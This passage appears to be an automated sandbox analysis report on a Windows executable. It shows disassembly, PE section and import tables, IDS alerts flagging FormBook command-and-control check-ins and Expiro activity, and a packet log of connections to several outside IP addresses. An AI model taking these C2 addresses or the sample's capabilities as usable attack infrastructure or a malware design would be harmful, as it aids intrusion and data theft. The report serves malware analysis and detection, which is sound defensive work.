                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F06C0B76A63h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F06C0B76AB5h
                                                          bt esi, 03h
                                                          jnc 00007F06C0B76B08h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x57e08.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dcc40x8de003de9cc8884ce5b00bc2079b745b786a7False0.5728679102422908data6.676133860974604IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc70000x57e080x58000e2229c33a960e2288899df7856be3b78False0.9244190562855114data7.889756080276442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x11f0000x960000x95000a550f1cde2f6bf15519fab3c1e6f8364False0.97575470585151data7.9380417991201515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcf7b80x4f0cedata1.0003273726798234
                                                          RT_GROUP_ICON0x11e8880x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x11e9000x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x11e9140x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x11e9280x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x11e93c0xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x11ea180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-11T01:00:38.246645+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64999985.159.66.9380TCP
                                                          2025-01-11T01:00:38.246645+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999985.159.66.9380TCP
                                                          2025-01-11T01:00:46.780676+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.649731TCP
                                                          2025-01-11T01:00:46.780676+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.649731TCP
                                                          2025-01-11T01:00:47.813054+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.64973818.141.10.10780TCP
                                                          2025-01-11T01:01:27.071624+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649967161.97.142.14480TCP
                                                          2025-01-11T01:01:27.071624+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649967161.97.142.14480TCP
                                                          2025-01-11T01:01:43.249080+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998623.225.159.4280TCP
                                                          2025-01-11T01:01:46.014387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998723.225.159.4280TCP
                                                          2025-01-11T01:01:48.545833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998823.225.159.4280TCP
                                                          2025-01-11T01:01:51.123830+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64998923.225.159.4280TCP
                                                          2025-01-11T01:01:51.123830+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64998923.225.159.4280TCP
                                                          2025-01-11T01:01:58.155103+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990149.88.81.19080TCP
                                                          2025-01-11T01:02:00.703887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991149.88.81.19080TCP
                                                          2025-01-11T01:02:03.249004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992149.88.81.19080TCP
                                                          2025-01-11T01:02:25.653554+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649993149.88.81.19080TCP
                                                          2025-01-11T01:02:25.653554+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649993149.88.81.19080TCP
                                                          2025-01-11T01:02:32.295755+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999585.159.66.9380TCP
                                                          2025-01-11T01:02:34.860589+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999685.159.66.9380TCP
                                                          2025-01-11T01:02:37.623969+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999785.159.66.9380TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 01:00:45.935292006 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:45.940114021 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:45.940226078 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:45.974980116 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:45.975164890 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:45.979851961 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:45.979898930 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:46.673051119 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:46.673578024 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:46.673706055 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:46.775016069 CET4973180192.168.2.654.244.188.177
                                                          Jan 11, 2025 01:00:46.780675888 CET804973154.244.188.177192.168.2.6
                                                          Jan 11, 2025 01:00:47.214601040 CET4973880192.168.2.618.141.10.107
                                                          Jan 11, 2025 01:00:47.219908953 CET804973818.141.10.107192.168.2.6
                                                          Jan 11, 2025 01:00:47.220139980 CET4973880192.168.2.618.141.10.107
                                                          Jan 11, 2025 01:00:47.220217943 CET4973880192.168.2.618.141.10.107
                                                          Jan 11, 2025 01:00:47.220243931 CET4973880192.168.2.618.141.10.107
                                                          Jan 11, 2025 01:00:47.225378036 CET804973818.141.10.107192.168.2.6
                                                          Jan 11, 2025 01:00:47.225389957 CET804973818.141.10.107192.168.2.6
                                                          Jan 11, 2025 01:00:47.813054085 CET4973880192.168.2.618.141.10.107
                                                          Jan 11, 2025 01:01:26.434246063 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:26.439141035 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:26.439240932 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:26.450305939 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:26.456468105 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071369886 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071391106 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071408987 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071420908 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071564913 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:27.071624041 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:27.071666956 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:27.078089952 CET4996780192.168.2.6161.97.142.144
                                                          Jan 11, 2025 01:01:27.084273100 CET8049967161.97.142.144192.168.2.6
                                                          Jan 11, 2025 01:01:42.680042028 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:42.687156916 CET804998623.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:42.687263966 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:42.744792938 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:42.753174067 CET804998623.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:43.205363989 CET804998623.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:43.249079943 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:43.274890900 CET804998623.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:43.275005102 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:44.249053955 CET4998680192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:45.428425074 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:45.435137033 CET804998723.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:45.435215950 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:45.452917099 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:45.459507942 CET804998723.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:45.971529961 CET804998723.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:46.014386892 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:46.032768965 CET804998723.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:46.032821894 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:46.967700958 CET4998780192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:47.986356974 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:47.991249084 CET804998823.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:47.991413116 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:48.006728888 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:48.011573076 CET804998823.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:48.011653900 CET804998823.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:48.504317999 CET804998823.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:48.545833111 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:48.574558973 CET804998823.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:48.574640989 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:49.514791965 CET4998880192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:50.533736944 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:50.539570093 CET804998923.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:50.539726019 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:50.552114964 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:50.558840990 CET804998923.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:51.076904058 CET804998923.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:51.123830080 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:51.144654989 CET804998923.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:51.144814968 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:51.145803928 CET4998980192.168.2.623.225.159.42
                                                          Jan 11, 2025 01:01:51.151226997 CET804998923.225.159.42192.168.2.6
                                                          Jan 11, 2025 01:01:56.628379107 CET4999080192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:56.633160114 CET8049990149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:01:56.633240938 CET4999080192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:56.648313046 CET4999080192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:56.653101921 CET8049990149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:01:58.155102968 CET4999080192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:58.208221912 CET8049990149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:01:59.174149990 CET4999180192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:59.179474115 CET8049991149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:01:59.179558992 CET4999180192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:59.194875002 CET4999180192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:01:59.200017929 CET8049991149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:00.703886986 CET4999180192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:00.752203941 CET8049991149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:01.721157074 CET4999280192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:01.726013899 CET8049992149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:01.726142883 CET4999280192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:01.741420031 CET4999280192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:01.746201038 CET8049992149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:01.746294975 CET8049992149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:03.249003887 CET4999280192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:03.296183109 CET8049992149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:04.268137932 CET4999380192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:04.274821043 CET8049993149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:04.275012016 CET4999380192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:04.284415960 CET4999380192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:04.290715933 CET8049993149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:18.012955904 CET8049990149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:18.013176918 CET4999080192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:20.555819035 CET8049991149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:20.555892944 CET4999180192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:23.091209888 CET8049992149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:23.091290951 CET4999280192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:25.653426886 CET8049993149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:25.653553963 CET4999380192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:25.654697895 CET4999380192.168.2.6149.88.81.190
                                                          Jan 11, 2025 01:02:25.659491062 CET8049993149.88.81.190192.168.2.6
                                                          Jan 11, 2025 01:02:30.767359018 CET4999580192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:30.772150040 CET804999585.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:30.772332907 CET4999580192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:30.788394928 CET4999580192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:30.793320894 CET804999585.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:32.295754910 CET4999580192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:32.302314997 CET804999585.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:32.302387953 CET4999580192.168.2.685.159.66.93
